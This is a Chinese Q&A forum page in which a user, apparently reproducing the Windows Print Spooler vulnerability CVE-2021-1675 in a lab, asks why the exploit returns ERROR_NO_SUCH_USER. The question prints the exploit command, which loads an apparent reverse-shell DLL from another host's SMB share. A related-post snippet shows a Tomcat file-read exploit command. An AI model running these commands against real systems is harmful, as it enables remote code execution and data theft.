复现【CVE-2021-1675】Windows Print Spooler 漏洞,环境是windows server 2019,kali,前面都没问题,到kali最后一步运行exp,指令是:python3 CVE-2021-1675.py fjnu.local/zhm:123@192.168.175.133 '\192.168.175.132\smb\rever.dll'
报错了:impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.
我搜出来大概意思应该是指定的账户不存在,可是我在2019里面创建的域用户zhm是成功了的啊,怎么会不存在呢,请问有人能解答吗
CVE-2021-1675漏洞复现运行exp报错
- 写回答
- 好问题 0 提建议
- 追加酬金
- 关注问题
分享- 邀请回答
-
1条回答 默认 最新
- 2023-02-15 17:35回答 7 已采纳 CVE-1999-0017是一个非常旧的漏洞,它存在于UNIX系统中的某些文件管理器程序中,可能允许攻击者使用“..”操作符绕过访问控制,查看和编辑敏感文件。但由于该漏洞出现的时间非常早,因此现代操作
- 2023-04-20 12:24回答 1 已采纳 【8版本】OpenSSH CBC模式 弱加密算法漏洞(CVE-2008-5161)根据这个帖子解决了!非常感谢!
- 2022-07-28 16:46回答 2 已采纳 卧槽兄弟莫非同一个厂商?、好眼熟的报告和扫描器、这种需要修复的话报告里面补丁链接都有的、下载安装即可
- 2024-04-16 03:052401_83946826的博客 python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
- 2020-09-16 08:27回答 2 已采纳 ``` 第一步,从第11行开始,直接用逗号分割。 判断分割后的数据总长度是否是 7 列; 如果是,替换文本中的双引号,解析完成; 否则继续; 第二步,超过 7 列
- 2022-02-05 14:38回答 4 已采纳 查看源码和驱动版本是不是对应的,你的源码可能是什么版本?驱动又是什么版本的?
- 2016-09-21 11:28回答 3 已采纳 Take a look into this project https://github.com/urule99/jsunpack-n - A Generic JavaScript Unpacke
- 2023-02-10 16:35深白色耳机的博客 pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用...
- 2017-11-27 13:49回答 2 已采纳 Don't worry about test failures, if your compilation job finished successfully then the resulting
- 2018-01-18 03:39回答 6 已采纳 http://blog.csdn.net/jefferylakie/article/details/72820889
- 2022-09-21 09:01回答 2 已采纳 淘宝源今天证书过期了。切换到华为源吧registry=https://repo.huaweicloud.com/repository/npm/
- 2022-03-07 18:00蚁景网安实验室的博客 点击蓝字关注我们上周刚学习路由器固件分析,并尝试复现了一个简单的CVE。中间遇到了很多的坑点,虽然把漏洞复现了,但是过程可谓曲折。ps:该文章以复现CVE-2017-17215为基础,提供...
- 2023-03-16 11:52回答 3 已采纳 基于GPT的解答你可以使用Python编写脚本来从一个txt文件中获取ip地址列表,然后对每个ip地址执行命令。 以下是一个示例脚本,它将从名为“ip_addresses.txt”的文件中读取ip地址
- 2021-11-15 07:50Ms08067安全实验室的博客 文章来源|MS08067 Web安全漏洞挖掘实战班课后作业本文作者:某学员A(Web漏洞挖掘实战班1期学员)写再最前听了涛哥关于weblogic的课程讲解,收益颇多(前段时间实在太忙了~ ...
- 2021-10-09 17:42yAnd0n9的博客 Spring Security OAuth2 RCE(CVE-2016-4977) 0x00 漏洞描述 Spring Security OAuth 支持使用标准 Spring 和 Spring Security 编程模型和配置习惯用法与 OAuth (1a) 和 OAuth2 一起使用 Spring Security。 在使用白...
- 2023-07-15 19:56xiaoheizi安全的博客 Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。信息泄露路径:http://...
- 2024-04-18 05:17阿里P6+的博客 Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对...
- 2023-04-12 19:59Sillage777的博客 -》保存 漏洞复现 /root/Oracle/Middleware/user_projects/domains/base_domain https://vulhub.org/#/environments/weblogic/CVE-2018-2894/ https://blog.riskivy.com/weblogic-cve-2018-2894/ 漏洞利用 exp #!...
- 2021-11-14 19:311ance.的博客 文章目录简介Spring Security OAuth2远程命令执行(CVE-2016-4977)漏洞原理影响范围漏洞复现修复建议Spring Web Flow框架远程代码执行(CVE-2017-4971)漏洞原理影响范围漏洞复现修复建议Spring Data Rest远程命令执行...
- 没有解决我的问题, 去提问
问题事件
系统已结题
5月2日
已采纳回答
4月24日-
创建了问题
12月28日
悬赏问题
- ¥30 设计一个图形用户界面来控制你机械臂的运动
- ¥30 3d打印机无法识别到SD卡,如何解决?(相关搜索:格式化)
- ¥15 RPG游戏架构设计和开发方法
- ¥30 为什么会失败呢,该如何调整
- ¥15 前端返回pdf时不显示内容
- ¥50 如何在不能联网影子模式下的电脑解决usb锁
- ¥20 服务器redhat5.8网络问题
- ¥15 如何利用c++ MFC绘制复杂网络多层图
- ¥20 要做柴油机燃烧室优化 需要保持压缩比不变 请问怎么用AVL fire ESE软件里面的 compensation volume 来使用补偿体积来保持压缩比不变
- ¥15 python螺旋图像